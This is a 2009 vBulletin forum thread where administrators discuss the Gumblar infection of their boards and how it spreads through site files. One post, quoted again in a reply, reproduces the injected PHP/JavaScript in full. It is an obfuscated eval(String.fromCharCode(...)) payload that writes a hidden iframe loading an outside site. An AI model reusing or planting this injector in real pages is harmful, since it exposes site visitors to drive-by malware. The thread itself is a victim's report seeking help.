Go Back   vb.org Archive > Community Discussions > Forum and Server Management
  #1  
Old 05-15-2009, 03:24 PM
RedSpiral RedSpiral is offline
 
Join Date: Apr 2009
Location: England
Posts: 19
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Gumblar Virus - Stupid thing!

I've just had a client whose vbulletin was infected by gumblar.
Read the article.
http://uk.news.yahoo.com/16/20090515...w-6315470.html

I spent an hour or 2 trying to get rid of it but no luck...so had to do a fresh install luckly board was new but still this virus is so annoying!
Reply With Quote
  #2  
Old 05-16-2009, 02:52 PM
silvermerc silvermerc is offline
 
Join Date: Apr 2006
Posts: 449
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Is this the code;
PHP Code:
?>

<?php echo ''?><?php echo ''?><?php echo '<script 
type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,106,61,52,50,52,52,52,51,59,118,97,114,32,104,106,103,50,50,61,34,99,111,112,121,34,59,118,97,114,32,119,61,34,111,34,59,118,97,114,32,114,101,54,61,34,108,105,115,116,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,50,50,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,104,103,52,61,50,51,49,49,50,51))</script>'

?>'
I seem to be getting infected by that :{
Reply With Quote
  #3  
Old 05-16-2009, 06:38 PM
RedSpiral RedSpiral is offline
 
Join Date: Apr 2009
Location: England
Posts: 19
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by silvermerc View Post
Is this the code;
PHP Code:
?>

<?php echo ''?><?php echo ''?><?php echo '<script 
type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,106,61,52,50,52,52,52,51,59,118,97,114,32,104,106,103,50,50,61,34,99,111,112,121,34,59,118,97,114,32,119,61,34,111,34,59,118,97,114,32,114,101,54,61,34,108,105,115,116,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,50,50,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,104,103,52,61,50,51,49,49,50,51))</script>'

?>'
I seem to be getting infected by that :{
whats your forum url?

To know its its gumblar go to your forum and in the status bar it should say loading from gumblar.cn

But yes I think you might gumblar.
Reply With Quote
  #4  
Old 05-17-2009, 03:14 AM
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Location: Melbourne, Australia
Posts: 15,047
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

If that's being placed directly into your files - you may have a bigger problem than just that...
Reply With Quote
  #5  
Old 05-21-2009, 11:58 PM
silvermerc silvermerc is offline
 
Join Date: Apr 2006
Posts: 449
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

it spreads through files -cry
file url is in my profile :}
Reply With Quote
  #6  
Old 05-22-2009, 04:12 AM
raiderlax's Avatar
raiderlax raiderlax is offline
 
Join Date: Sep 2006
Location: Ontario, Canada
Posts: 499
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

How does a forum even get infected with this?
Reply With Quote
  #7  
Old 05-22-2009, 05:28 AM
silvermerc silvermerc is offline
 
Join Date: Apr 2006
Posts: 449
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Its has the priorities to be confiker aswel btw thats the problem
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 02:14 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.07449 seconds
  • Memory Usage 2,220KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_php
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (7)post_thanks_box
  • (7)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (7)post_thanks_postbit_info
  • (7)postbit
  • (7)postbit_onlinestatus
  • (7)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete